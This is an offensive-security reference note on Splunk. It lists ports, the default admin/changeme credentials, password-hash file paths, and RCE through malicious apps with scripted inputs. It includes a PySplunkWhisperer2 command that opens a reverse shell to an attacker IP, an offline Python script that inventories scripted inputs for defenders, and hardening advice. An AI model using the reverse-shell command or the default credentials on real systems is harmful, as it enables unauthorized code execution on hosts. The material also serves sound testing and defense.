Splunk
aka Splunk Enterprise, Universal Forwarder
Log/analytics platform. Splunk runs apps, so a malicious app with a scripted input is reliable RCE, often as root/SYSTEM, and the default admin:changeme is everywhere.
Ports
| Port | Proto | Notes |
|---|---|---|
| 8000 | tcp | Splunk web UI |
| 8089 | tcp | management / REST API (forwarder agent) |
| 9997 | tcp | forwarder receiving |
Fingerprint
- Login at :8000/en-US/account/login
- Management API on :8089 (often exposed on forwarders without a UI)
Key files
| Path | Holds | Sensitive |
|---|---|---|
| $SPLUNK_HOME/etc/passwd | Splunk user password hashes | sensitive |
| $SPLUNK_HOME/etc/system/local/authentication.conf | auth backend config | sensitive |
Default / weak creds
admin / changeme (classic default)
Service users
splunk (commonly root or SYSTEM)
Exploitation primitives
- Deploy a custom app containing a scripted/modular input that runs your script: RCE as the Splunk service account
- Push the app to forwarders via the deployment server for mass code exec
- SplunkWhisperer2 automates the forwarder-agent (8089) attack
Overview
Splunk is built to run code (search scripts, app inputs), which makes admin access or an exposed forwarder agent a straightforward shell, frequently with high privilege.
RCE via a malicious app
```shell
# package an app with bin/rev.py + inputs.conf (scripted input), then upload via
# Manage Apps -> Install app from file, or against the forwarder agent:
python PySplunkWhisperer2_remote.py --host <TARGET> --lhost <YOUR_IP> \
    --username admin --password changeme --payload "reverse shell" --lport 4444
```
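Because the RCE primitive above is just a `[script://...]` stanza in an app's `inputs.conf`, the defender-side counterpart is an inventory of every scripted input on the box. The following is an added example (not part of the original note, not a Splunk tool): it walks `$SPLUNK_HOME/etc/apps/*/{default,local}/inputs.conf`, lists each scripted input with its app, scope, interval and enabled state, and runs offline against a small constructed app tree. The app name `totally_legit_app` and script names in the sample are constructed.

```python
"""Inventory scripted inputs across Splunk apps (added defender-side example)."""
import configparser
import tempfile
from pathlib import Path
from typing import Dict, List

# Constructed sample tree: one benign app with a file monitor, one app that
# ships scripted inputs (one enabled in local/, one disabled in default/).
SAMPLE_CONFS = {
    "apps/search/default/inputs.conf": """
[monitor://$SPLUNK_HOME/var/log/splunk]
index = _internal
""",
    "apps/totally_legit_app/local/inputs.conf": """
[script://./bin/updater.py]
interval = 60
disabled = 0
sourcetype = updater
""",
    "apps/totally_legit_app/default/inputs.conf": """
[script://$SPLUNK_HOME/etc/apps/totally_legit_app/bin/collect.sh]
interval = 300
disabled = 1
""",
}


def write_sample_tree(root: Path) -> Path:
    """Materialise the constructed confs under <root>/etc and return that path."""
    etc = root / "etc"
    for rel, text in SAMPLE_CONFS.items():
        target = etc / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text.lstrip(), encoding="utf-8")
    return etc


def find_scripted_inputs(splunk_etc: Path) -> List[Dict]:
    """Return one record per [script://...] stanza found in any app's inputs.conf.

    Splunk conf files are INI-like, so configparser is enough; interpolation is
    disabled because stanza names and values contain '$' and '%' literally, and
    strict=False tolerates the duplicate keys Splunk itself accepts.
    """
    findings: List[Dict] = []
    for conf in sorted(splunk_etc.glob("apps/*/*/inputs.conf")):
        scope = conf.parent.name          # "default" or "local"
        if scope not in ("default", "local"):
            continue
        app = conf.parents[1].name
        parser = configparser.ConfigParser(interpolation=None, strict=False)
        parser.read(conf, encoding="utf-8")
        for stanza in parser.sections():
            if not stanza.startswith("script://"):
                continue
            disabled = parser.get(stanza, "disabled", fallback="0").strip().lower()
            findings.append({
                "app": app,
                "scope": scope,
                "script": stanza[len("script://"):],
                "interval": parser.get(stanza, "interval", fallback=None),
                "enabled": disabled not in ("1", "true"),
            })
    return findings


def scan_sample() -> List[Dict]:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_scripted_inputs(write_sample_tree(Path(tmp)))


if __name__ == "__main__":
    # On a real host, point find_scripted_inputs() at $SPLUNK_HOME/etc instead.
    for f in scan_sample():
        state = "ENABLED" if f["enabled"] else "disabled"
        print(f"{f['app']:20} {f['scope']:8} {state:9} interval={f['interval']}  {f['script']}")
```

Any stanza this prints for an app you did not install deliberately deserves a look at the referenced script, and an enabled entry in `local/` of a recently added app is exactly the shape of the malicious-app primitive. Modular inputs use their own `[<scheme>://...]` stanzas and are not covered by the `script://` filter; extend the prefix check if you want those listed too.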
Hardening
Change the default admin password, restrict who can install apps, and run Splunk as a low-privileged account.